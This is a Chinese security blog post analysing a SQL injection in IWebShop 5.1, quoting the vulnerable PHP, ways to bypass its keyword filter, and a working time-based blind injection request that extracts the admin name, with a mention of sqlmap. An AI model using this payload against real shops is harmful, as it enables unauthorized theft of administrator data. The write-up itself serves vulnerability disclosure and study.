<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>IWebShop5.1一处SQL注入 - x1a0t&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content=PHP,SQLI>
  
  
    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.02">
  
  
    <link rel="alternate" href="/atom.xml " title="x1a0t&#39;s Blog" type="application/atom+xml">
  

  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.2.0"></head>
  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">x1a0t&#39;s Blog</a>
    <div class="subtitle"></div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">Home</a>
        </li>
      
        <li class="menu-item">
          <a href="/links" class="menu-item-link">Links</a>
        </li>
      
        <li class="menu-item">
          <a href="/notes" class="menu-item-link">Notes</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">About</a>
        </li>
      
    </ul>
  </nav>
</header>
<article class="post">
  <div class="post-title">
    <h1 class="article-title">IWebShop5.1一处SQL注入</h1>
  </div>
   <div class="post-meta">
    <span class="post-time">2018-07-20</span>
    
      <ul class="post-tag-list" itemprop="keywords"><li class="post-tag-list-item"><a class="post-tag-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="post-tag-list-item"><a class="post-tag-list-link" href="/tags/SQLI/" rel="tag">SQLI</a></li></ul>
    
  </div>
  <div class="post-content">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>导致这个漏洞的原因，是因为程序员忘记在拼接SQL语句时添加限制，以及在过滤语句中犯了比较低级的错误。</p>
<p>版本：IWebShopV5.1.18030300</p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p>漏洞函数存在于&#x2F;controller&#x2F;seller.php:1498</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">categoryAjax</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$id</span>        = <span class="title class_">IFilter</span>::<span class="title function_ invoke__">act</span>(<span class="title class_">IReq</span>::<span class="title function_ invoke__">get</span>(<span class="string">&#x27;id&#x27;</span>));</span><br><span class="line">    <span class="variable">$parent_id</span> = <span class="title class_">IFilter</span>::<span class="title function_ invoke__">act</span>(<span class="title class_">IReq</span>::<span class="title function_ invoke__">get</span>(<span class="string">&#x27;parent_id&#x27;</span>));</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$id</span> &amp;&amp; <span class="title function_ invoke__">is_array</span>(<span class="variable">$id</span>))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">foreach</span>(<span class="variable">$id</span> <span class="keyword">as</span> <span class="variable">$category_id</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="variable">$childString</span> = goods_class::<span class="title function_ invoke__">catChild</span>(<span class="variable">$category_id</span>);<span class="comment">//父类ID不能死循环设置成其子分类</span></span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$parent_id</span> &gt; <span class="number">0</span> &amp;&amp; <span class="title function_ invoke__">stripos</span>(<span class="string">&quot;,&quot;</span>.<span class="variable">$childString</span>.<span class="string">&quot;,&quot;</span>,<span class="string">&quot;,&quot;</span>.<span class="variable">$parent_id</span>.<span class="string">&quot;,&quot;</span>) !== <span class="literal">false</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="keyword">die</span>(JSON::<span class="title function_ invoke__">encode</span>(<span class="keyword">array</span>(<span class="string">&#x27;result&#x27;</span> =&gt; <span class="string">&#x27;fail&#x27;</span>)));</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>使用<code>IReq::get</code>函数接受传入数据后，传入<code>IFilter::act</code>函数进行过滤，没有第二个参数的情况下，默认使用’string’方式过滤，即给参数添加转义，相关代码就不贴了。</p>
<p>上面将接受的$id数组处理后，传入了<code>catChild</code>函数，跟进查看&#x2F;classes&#x2F;goods_class.php:669</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">catChild</span>(<span class="params"><span class="variable">$catId</span>,<span class="variable">$level</span> = <span class="number">1</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$level</span> == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$catId</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$temp</span>   = <span class="keyword">array</span>();</span><br><span class="line">    <span class="variable">$result</span> = <span class="keyword">array</span>(<span class="variable">$catId</span>);</span><br><span class="line">    <span class="variable">$catDB</span>  = <span class="keyword">new</span> <span class="title class_">IModel</span>(<span class="string">&#x27;category&#x27;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(<span class="literal">true</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="variable">$id</span> = <span class="title function_ invoke__">current</span>(<span class="variable">$result</span>);</span><br><span class="line">        <span class="keyword">if</span>(!<span class="variable">$id</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$temp</span> = <span class="variable">$catDB</span>-&gt;<span class="title function_ invoke__">query</span>(<span class="string">&#x27;parent_id = &#x27;</span>.<span class="variable">$id</span>);</span><br></pre></td></tr></table></figure>

<p>这里把$id直接拼接进了SQL语句，但是并没有添加引号，前面的过滤也就起不到作用，导致我们可以构造SQL语句进行注入</p>
<p>有趣的是，该系统自己写了个基于黑名单的过滤语句，看起来相当烂，在&#x2F;lib&#x2F;core&#x2F;util&#x2F;filter_class.php:271</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">word</span>(<span class="params"><span class="variable">$str</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$word</span> = <span class="keyword">array</span>(<span class="string">&quot;select &quot;</span>,<span class="string">&quot;select/*&quot;</span>,<span class="string">&quot;update &quot;</span>,<span class="string">&quot;update/*&quot;</span>,<span class="string">&quot;delete &quot;</span>,<span class="string">&quot;delete/*&quot;</span>,<span class="string">&quot;insert into&quot;</span>,<span class="string">&quot;insert/*&quot;</span>,<span class="string">&quot;updatexml&quot;</span>,<span class="string">&quot;concat&quot;</span>,<span class="string">&quot;()&quot;</span>,<span class="string">&quot;`&quot;</span>,<span class="string">&quot;/**/&quot;</span>,<span class="string">&quot;union(&quot;</span>);</span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$word</span> <span class="keyword">as</span> <span class="variable">$val</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">stripos</span>(<span class="variable">$str</span>,<span class="variable">$val</span>) !== <span class="literal">false</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">self</span>::<span class="title function_ invoke__">removeEmoji</span>(<span class="variable">$str</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里对select的过滤仅仅是匹配了两种形式，我们完全可以使用<code>select%0a</code>、<code>select(</code>等多种方式绕过。值得吐槽的还有后面这个<code>()</code>，难道就为了防止我注出系统变量。。。</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>1、注册商家账号，后台审核通过（复现可直接后台添加商家），然后需要在商品分类处添加一个分类用于时间盲注</p>
<p>2、前台登陆商家管理，构造类似如下数据包</p>
<p><code>URL:/index.php?controller=seller&amp;action=categoryAjax</code></p>
<p><code>POST:id[]=0 and if(ascii(substr((select%0aadmin_name from admin),1,1))%3d97,sleep(10),1)&amp;parent_id=0</code></p>
<p>(此处的表名admin不需要添加前缀，CMS会自动添加)</p>
<p><img src="/2018/07/20/IWebShop5-1%20SQL%20Injection/78c3a068-63c8-47f4-af42-654efa86010a.png" alt="img"></p>
<p>当然，使用sqlmap跑盲注更加方便:</p>
<p><img src="/2018/07/20/IWebShop5-1%20SQL%20Injection/747b0911-5798-46c8-bb08-70eef8ee7794.png" alt="img"></p>

  </div>
  <div class="post-footer">
    <a href="#top" class="top">Post.Top</a>
  </div>
</article>
<footer>
  &copy; 2024
  <span class="author">
    x1a0t
  </span>
</footer>
    </div>
  </body>
</html>